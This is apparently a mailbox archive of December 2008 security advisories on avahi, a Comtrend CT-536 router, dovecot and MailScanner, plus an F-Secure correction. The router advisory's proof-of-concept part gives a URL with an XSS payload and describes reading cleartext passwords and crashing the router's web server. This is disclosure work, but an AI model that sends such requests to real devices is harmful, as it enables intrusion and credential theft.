- ------------------------------------------------------------------------
Debian Security Advisory DSA-1690-1                  security@debian.org
http://www.debian.org/security/                           Florian Weimer
December 22, 2008                     http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : avahi
Vulnerability  : assert errors
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2007-3372 CVE-2008-5081
Debian Bug     : 508700

Two denial of service conditions were discovered in avahi, a Multicast
DNS implementation.

Huge Dias discovered that the avahi daemon aborts with an assert error
if it encounters a UDP packet with source port 0 (CVE-2008-5081).

It was discovered that the avahi daemon aborts with an assert error if
it receives an empty TXT record over D-Bus (CVE-2007-3372).

For the stable distribution (etch), these problems have been fixed in
version 0.6.16-3etch2.

For the unstable distribution (sid), these problems have been fixed in
version 0.6.23-3.

We recommend that you upgrade your avahi packages.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- -------------------------------

Source archives:

  http://security.debian.org/pool/updates/main/a/avahi/avahi_0.6.16-3etch2.dsc
    Size/MD5 checksum:     1570 8ebff455c9264d5dbee95ab9577378e5
  http://security.debian.org/pool/updates/main/a/avahi/avahi_0.6.16.orig.tar.gz
    Size/MD5 checksum:   891970 3cbc460bbd55bae35f7b57443c063640
  http://security.debian.org/pool/updates/main/a/avahi/avahi_0.6.16-3etch2.diff.gz
    Size/MD5 checksum:    19735 a44b3f5fec53e6316da43c6a3b442e8c

Architecture independent packages:

  http://security.debian.org/pool/updates/main/a/avahi/avahi-discover_0.6.16-3etch2_all.deb
    Size/MD5 checksum:    25370 340795bc9ca2e64e801fddaac6d7a8bf
  http://security.debian.org/pool/updates/main/a/avahi/python-avahi_0.6.16-3etch2_all.deb
    Size/MD5 checksum:    25652 d6cf860ba2a5f8a098976473782c2a83

alpha architecture (DEC Alpha)

  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core4_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:   106662 3fbdf722dfb11e2c4a1b17cefb7ea6b8
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl0_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    40364 f4b2ea3da302452e2a9cbd4379daa26c
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-data_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    23236 b05daf8a7a7b981dac5be1dd7e252913
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-1_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    27876 2056bc73e28aef4de30a9fa6f3bd6281
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-dev_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    26886 1163c86061b5a4eec1eec373d35992ea
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client-dev_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    69410 bd94273184beb53cafb16fabfe8df360
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd-dev_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    59406 2590be33f54a8cb30734813b32187b60
  http://security.debian.org/pool/updates/main/a/avahi/avahi-dnsconfd_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    32158 adbfd269dbc193711191cfc263732116
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib1_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    24982 6ef2e7c31116934bd7799239ea834662
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common3_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    39680 68b046de883b7e4a6b3251b9b0806a54
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core-dev_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:   190518 e82fd413940e3c5b4df71504295912d3
  http://security.debian.org/pool/updates/main/a/avahi/avahi-daemon_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    80352 cb5ab982034883bd47faa500fc7f8aa6
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-1_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    25702 019fbb7d0668482101bcbdb54e3a49b7
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-dev_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    29382 785a026351cc4ed289d6abb939eaafaa
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client3_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    45044 aca2b939624cbf22b2562fae405a6996
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl-dev_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    64010 d0cf4e59a93ccc42d7ed4f3877e4dc14
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd1_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    34164 ecc7e8f47701a32382703785fe5f9491
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib-dev_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    27868 04564fbd11c4150d2e1b6cb0fbc22cea
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-dev_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    65540 ec965810133a4ab5546702af49d3f678
  http://security.debian.org/pool/updates/main/a/avahi/avahi-utils_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    44190 fd1f6ea45614a3d5922507c66d9b8898
  http://security.debian.org/pool/updates/main/a/avahi/avahi-autoipd_0.6.16-3etch2_alpha.deb
    Size/MD5 checksum:    41910 3232185589d641841f471581bc7efbb7

amd64 architecture (AMD x86_64 (AMD64))

  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-1_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    25402 513e95ad6c2fb87c8316de0f21a958c0
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core-dev_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:   145820 b234cdf7647e3d8d6bd919876a729aed
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common3_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    40014 893b50c144cd39194393b8b2b48e6af5
  http://security.debian.org/pool/updates/main/a/avahi/avahi-autoipd_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    40732 3ca1605985570ae1c5e60fbda1da2a5b
  http://security.debian.org/pool/updates/main/a/avahi/avahi-daemon_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    78998 8ac6bf69b330ae356c93d11040b1ce92
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client3_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    45972 f65a50acee002fef7de31413a55188d3
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-dev_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    27602 cc94bd6ef246c0907e8239ecc63aced8
  http://security.debian.org/pool/updates/main/a/avahi/avahi-utils_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    44184 3352ec376add650e83b1445f076225dd
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd1_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    34556 86dfbb1540112c5d7f76f44e228b4f4e
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-dev_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    58170 99c0ba315980248ac30cc3741f543a47
  http://security.debian.org/pool/updates/main/a/avahi/avahi-dnsconfd_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    31888 6097f6fd4229243cb5456bd8eec2b8b2
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core4_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:   109494 6bbe277f75b34f90299b9371369b6d4d
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl-dev_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    53320 30431adf1d426ac45a259997cba31d3d
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-dev_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    25670 5e76611ac629222a1b296c6d31164055
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client-dev_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    53668 d1472f40bb294e10b9d60d49ce2cfe5b
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl0_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    39456 6f58090398ccee7ae34a425698a7e564
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd-dev_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    53434 c6e51db5ed2491e6b5712f9d5ab859f0
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib-dev_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    26584 366cca7021dc0f3a11096f56b10d1917
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-data_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    22952 a32b47c3d7246b6b4684570aeef8073a
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib1_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    25202 e1bbd694e3337905a27df1b5002247b0
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-1_0.6.16-3etch2_amd64.deb
    Size/MD5 checksum:    27528 a9675e1d025162d1f084274c76ecf15a

hppa architecture (HP PA RISC)

  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-data_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    22912 15f25a3fa47daead5ac5e6726798f868
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-1_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    30470 e884ed20cd4e9372ab8bf7f058312a3d
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib1_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    27256 e784b9c093a6d1b4738e9e640e1a4183
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core4_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:   112406 ee560a6ecbdadd461097468dae9c9faf
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client3_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    46122 346a99034145ba0d2fa841dd8f5be168
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl0_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    40786 461cee0bd4f3d0e987c308daa70b0486
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-dev_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    26124 574f1a1c1a28431e5f087cc4f586910c
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl-dev_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    56718 f73efff9470440cfeb85fd1526f6d314
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client-dev_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    56198 0911a3c7851f103cf496e05e2d28dbf4
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common3_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    43422 6c007186fef8b3ef65d2aeb1905fce80
  http://security.debian.org/pool/updates/main/a/avahi/avahi-utils_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    43900 8ee1473948cb706b8ae20747db126037
  http://security.debian.org/pool/updates/main/a/avahi/avahi-dnsconfd_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    32070 274489d75dcf98d81ee3b728951c5150
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib-dev_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    26874 53cecb7746a23d8469abd841a6022b5a
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd1_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    34578 bcb55e3c180fa8d34955578e8c35a733
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-dev_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    61094 a20a57641eabb686ca3df5b83a8385f6
  http://security.debian.org/pool/updates/main/a/avahi/avahi-autoipd_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    43592 b1e4af50f06c1369414713f90c4cbb5b
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core-dev_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:   159974 ec67b38e546b51d8d3282e3aac5690c8
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-1_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    27958 275562493b65aed9efb3a8e9a5bacd46
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd-dev_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    54152 57746ebeca191c973941d9f22309261d
  http://security.debian.org/pool/updates/main/a/avahi/avahi-daemon_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    79584 ae8341ab2f4a6232f7a9e4e31f2628e0
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-dev_0.6.16-3etch2_hppa.deb
    Size/MD5 checksum:    28448 8279827bbe596cc31c8c92f855e4077a

i386 architecture (Intel ia32)

  http://security.debian.org/pool/updates/main/a/avahi/avahi-autoipd_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    40232 0ab3fa7fc73fb609cdbec2d1d2ab514f
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client3_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    43358 f0a50ff65acb8ada30105bf9d5be6d43
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-1_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    27408 68e03f89a0a4ab49d3cf5631d81cefff
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core-dev_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:   131156 4f2d6816ff21fac92409300802b214c8
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl-dev_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    50306 95131a6cf96e271bc22b0a58f19d81c8
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd-dev_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    51264 b201facb01853a7feb377c476796faed
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-1_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    25214 2189bf23f2d2414c95f66de43fa9022e
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-dev_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    26904 d211581ca51292846f6e41501aab9f35
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client-dev_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    50050 55232395461a750e9589da67c4a6ce59
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib-dev_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    25932 a88e95d1f42acc1824ced261c034a6f8
  http://security.debian.org/pool/updates/main/a/avahi/avahi-daemon_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    76274 ee627ae2d4ae4675f36be9d773a60933
  http://security.debian.org/pool/updates/main/a/avahi/avahi-dnsconfd_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    31186 f598856b52c5338d76d08241d5147eba
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl0_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    37156 463df874fb4133e30f39efad5ae4c03c
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-data_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    22730 db3d21217b9d3a83c9ce61c2dc9088e9
  http://security.debian.org/pool/updates/main/a/avahi/avahi-utils_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    42082 710572c240f63df323ea5bc07981be0b
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-dev_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    55348 d759803be1ad6050495a8fcf7796528d
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd1_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    32504 d70eb6f318769fd7aba37dc9f27ffdd8
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib1_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    24736 b066f13687d60f3e30a76cc662c0de08
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core4_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:   101844 f0d31a9b2bf9491f1b2a11fe5527edd3
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-dev_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    25078 272eefbb1ebd24fb67392096bc092c91
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common3_0.6.16-3etch2_i386.deb
    Size/MD5 checksum:    38490 f1cabc135940e9b39eb9e9063023094f

ia64 architecture (Intel ia64)

  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd-dev_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    59488 9428587d37d42799458cbab9909717f1
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common3_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    46170 e0bd94aba8196fda2b280d63512c8766
  http://security.debian.org/pool/updates/main/a/avahi/avahi-utils_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    51248 a0e4eae8360a037128e21fb77ae3d4b6
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core-dev_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:   204800 dca516b15da8a9e63fba9126b8e6dd2f
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-libdnssd1_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    38584 cad1047d3aff3e09e48074a4ee00cb04
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-dev_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    69158 8a70000d6cbde8d4531af98f193b18a3
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-dev_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    28888 c63485e850a01b0f096c84fcbb8ae1d6
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-dev_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    26516 f5bffbc708792944bfb04b695bf28920
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt3-1_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    28750 e5981dddc42bf05306495bde1bcb69a0
  http://security.debian.org/pool/updates/main/a/avahi/avahi-dnsconfd_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    34536 cedfcaa6d06d244ff0fbc59193a964ef
  http://security.debian.org/pool/updates/main/a/avahi/avahi-daemon_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    98946 130de83abc67d61ae45c83613f7a21dd
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client-dev_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    69900 67c50228144e6f8f1cdb663bf34291b5
  http://security.debian.org/pool/updates/main/a/avahi/avahi-autoipd_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    48296 6d897886473453791d19e8baaa87e1a0
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib-dev_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    28854 d35e8426103f6138f856d0a362073096
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl0_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    44176 827f2e0285e80ac538f534bb95eb2e98
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-core4_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:   141590 5e272abfae6ff63932525bd307a1b3ec
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-common-data_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    23558 97a2a8e9885f5d1341220cbd3298dd47
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-glib1_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    26874 56b6a319a4861628a192f60bb14c92e6
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-qt4-1_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    26324 d11423a1bccc2d7302217303b9d045d2
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-client3_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    54430 d9c01e729dd9c015ca7f71176c950c06
  http://security.debian.org/pool/updates/main/a/avahi/libavahi-compat-howl-dev_0.6.16-3etch2_ia64.deb
    Size/MD5 checksum:    63530 d84b46e225352f225ed88a749a12243c

mips architecture (MIPS (Big Endian))


mipsel architecture (MIPS (Little Endian))


powerpc architecture (PowerPC)


s390 architecture (IBM S/390)


sparc architecture (Sun SPARC/UltraSPARC)



  These files will probably be moved into the stable distribution on
  its next update.

---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>

From - Mon Dec 22 15:39:34 2008
Message-ID: <494FD97D.7080807@isecauditors.com>
Date: Mon, 22 Dec 2008 19:16:29 +0100
From: ISecAuditors Security Advisories <advisories@isecauditors.com>
Organization: Internet Security Auditors
To: bugtraq@securityfocus.com
Subject: [ISecAuditors Security Advisories] Multiple vulnerabilities in WiFi router COMTREND CT-536/HG-536+

============================================
INTERNET SECURITY AUDITORS ALERT 2007-002
- Original release date: 31st January, 2007
- Last revised: 22nd December, 2008
- Discovered by: Daniel Fernandez Bleda
- Severity: 5/5
============================================
I. VULNERABILITY
-------------------------
Multiple vulnerabilities in WiFi router COMTREND CT-536/HG-536+

II. BACKGROUND
-------------------------
The CT-536 is an 802.11g (54Mbps) wireless and wired Local Area
Network (WLAN) ADSL router. Four 10/100 Base-T Ethernet and single USB
ports provide wired LAN connectivity with an integrated 802.11g WiFi
WLAN Access Point (AP) for wireless connectivity. The CT-536 ADSL
router provides state of the art security features such as WPA data
encryption; Firewall, VPN pass through.

III. DESCRIPTION
-------------------------
Improper validation in the micro_httpd server permits multiple attacks
through this stateless server. Also, access control is deficient and
does not control access at all. Credentials are sent in clear text so
"user" could get them easily.

Some fields and data are not filtered so XSS attacks and bofs can DoS
the httpd config server. In some cases the result also applies not only
to http and the router needs a reboot, losing the configuration and
resetting to default values. This means default passwords, open
wireless network, etc.

IV. PROOF OF CONCEPT
-------------------------
1. User "user" (least privileged user, read only and limited access
configuration reading) can ask for a not allowed resource and the server
will return the page asked for, including the password change resource:

http://192.168.0.1/password.html

2. The router sends the 3 users' passwords in clear inside the html to
make a fast check during the password change.

3. Some points in the configuration description options are
vulnerable to Cross Site Scripting attacks due to improper validation:

http://192.168.0.1/scvrtsrv.cmd?action=add&srvName=%3Cscript%3Ealert(%22XSS%22)%3C/script%3E&srvAddr=192.168.1.1&proto=1,&eStart=1,&eEnd=1,&iStart=1,&iEnd=1

4. Some resources (i.e. NAT table) are vulnerable to buffer overflow
attacks through the description fields, which seems to kill the
micro_httpd server although the router continues routing. Also similar
behaviour is seen when asking for URLs that add %13 and %10 chars,
without matching micro_httpd checks "..", "../", "/../".

5. User "user" accesses with "admin" privileges when connecting
through TELNET service.

6. User "support" seems to not exist at all.

7. SSH service cannot substitute TELNET or HTTP because it seems not
to exist at all in the router!

V. BUSINESS IMPACT
-------------------------
DoS of the Web Configuration interface although the router continues
routing.
DoS of router, causing a configuration reset, meaning the start
up of the Wireless interface (activated by default) without any type of
protection and the possibility to access the router or the network.
Reset of router configuration.
Access with "admin" (privileged) permissions for user "user".

VI. SYSTEMS AFFECTED
-------------------------
Firmware until version A101-302JAZ-C01_R05 (current)

VII. SOLUTION
-------------------------
Change the router.

VIII. REFERENCES
-------------------------
http://www.comtrend.com
http://www.acme.com/software/micro_httpd/
http://www.jazztel.com

IX. CREDITS
-------------------------
This vulnerability has been discovered and reported by
Daniel Fernandez Bleda (dfernandez (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
January   30, 2007: Initial release
April     18, 2007: First contact with the vendor. Minor corrections.
November  09, 2007: Some corrections applied.

XI. DISCLOSURE TIMELINE
-------------------------
January   30, 2007: Vulnerability acquired by
                    Internet Security Auditors
April     18, 2007: Initial vendor notification sent. No response.
May       01, 2007: Second vendor notification.
                    Response: will be studied.
May       22, 2007: Third vendor contact. Reported to their vendor for
                    analysis.
August    07, 2007: Fourth Vendor contact. Problem seems not to be
                    easy to correct. R/D Dept are studying the
                    solution.
November  09, 2007: Fifth Vendor contact. No response.
November  19, 2007: Sixth Vendor contact. No response.
December  07, 2007: Seventh Vendor contact. Chipset vendor is working.
November  11, 2008: Last Vendor contact. No response
December  22, 2008: Published.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors, S.L. accepts no responsibility for any
damage caused by the use or misuse of this information.

From - Mon Dec 22 15:49:34 2008
Date: Mon, 22 Dec 2008 14:20:06 -0500
From: rPath Update Announcements <announce-noreply@rpath.com>
To: security-announce@lists.rpath.com, update-announce@lists.rpath.com
Cc: full-disclosure@lists.grok.org.uk, vulnwatch@vulnwatch.org,
 bugtraq@securityfocus.com, lwn@lwn.net
Subject: rPSA-2008-0341-1 dovecot
Message-ID: <494fe866.tq6kem4ph3lcryu+%announce-noreply@rpath.com>

rPath Security Advisory: 2008-0341-1
Published: 2008-12-22
Products:
    rPath Linux 1
    rPath Linux 2

Rating: Severe
Exposure Level Classification:
    Local User Deterministic Privilege Escalation
Updated Versions:
    dovecot=conary.rpath.com@rpl:1/1.0.15-0.1-1
    dovecot=conary.rpath.com@rpl:2/1.0.15-0.1-1

rPath Issue Tracking System:
    https://issues.rpath.com/browse/RPL-2930

References:
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4577
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4870

Description:
    Previous versions of the dovecot package contain multiple
    vulnerabilities, the most serious of which allow authenticated
    users to bypass intended access restrictions.

http://wiki.rpath.com/Advisories:rPSA-2008-0341

Copyright 2008 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

From - Mon Dec 22 15:59:34 2008
Date: 22 Dec 2008 09:14:25 -0000
Message-ID: <20081222091425.4151.qmail@securityfocus.com>
From: mikael.albrecht@f-secure.com
To: bugtraq@securityfocus.com
Subject: Re: [IVIZ-08-016] F-Secure f-prot Antivirus for Linux corrupted ELF header Security Bypass

This posting contains incorrect information. 

F-Secure Corporation has verified that the claimed vulnerability doesn't affect any F-Secure products. Our assumption is that iViZ have mixed up products from F-Secure Corporation and Frisk Software International. iViZ have already corrected their own advisory at the time of writing this and removed all references to F-Secure.

Mikael Albrecht
F-Secure Corporation

From - Mon Dec 22 18:19:34 2008
To: bugtraq@securityfocus.com
Subject: [ MDVA-2008:241 ] mailscanner
Date: Mon, 22 Dec 2008 13:07:00 -0700
From: security@mandriva.com
Reply-To: <xsecurity@mandriva.com>
Message-Id: <E1LEr3M-0007uN-KX@titan.mandriva.com>


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                          MDVA-2008:241
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : mailscanner
 Date    : December 22, 2008
 Affected: Corporate 4.0
 _______________________________________________________________________

 Problem Description:

 Local users can use symlink attacks through a flaw in the
 trend-autoupdate script of MailScanner by using the /tmp/opr.ini.#####
 or /tmp/lpt temporary file (CVE-2008-5140).
 
 Local users can use symlink attacks through flaws in the
 clamav-autoupdate, panda-autoupdate and rav-autoupdate scripts of
 MailScanner by using the ClamAV.update.log, pav.zip and RavBusy.lock
 temporary files (CVE-2008-5312).
 
 Local users can use symlink attacks through flaws in the
 kaspersky-wrapper, bitdefender-wrapper, rav-wrapper scripts and the
 Quarentine.pm, TNEF.pm, SA.pm, WorkArea.pm MailScanner perl modules
 by using the kavoutput.tmp.27073, log.bdc.27073, report.vir.27073,
 MailScanner.ownertest.27073, tnef.27073 and MS.bayes.rebuild.lock
 temporary files (CVE-2008-5313).
 
 Further, MailScanner had symlink flaws in the antivir-autoupdate,
 bitdefender-autoupdate, clamav-autoupdate, etrust-autoupdate,
 generic-autoupdate, inoculan-autoupdate, kaspersky-autoupdate,
 nod32-autoupdate, norman-autoupdate, rav-autoupdate,
 sophos-autoupdate, symscanengine-autoupdate, vexira-autoupdate,
 f-prot-autoupdate and css-autoupdate scripts through the following
 vulnerable temporary files: AntiVirBusy.lock, BitDefenderBusy.lock,
 ClamAVBusy.lock, eTrustBusy.lock, GenericBusy.lock, InoculanBusy.lock,
 KasperskyBusy.lock, Nod32Busy.lock, NormanBusy.lock, RavBusy.lock,
 SophosBusy.lock, SymScanEngineBusy.lock, VexiraBusy.lock,
 FProtBusy.lock and SYMCScan.lock.
 
 This update provides fixes for all symlink flaws described in this
 security advisory.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5140
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5312
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5313
 _______________________________________________________________________

 Updated Packages:

 Corporate 4.0:
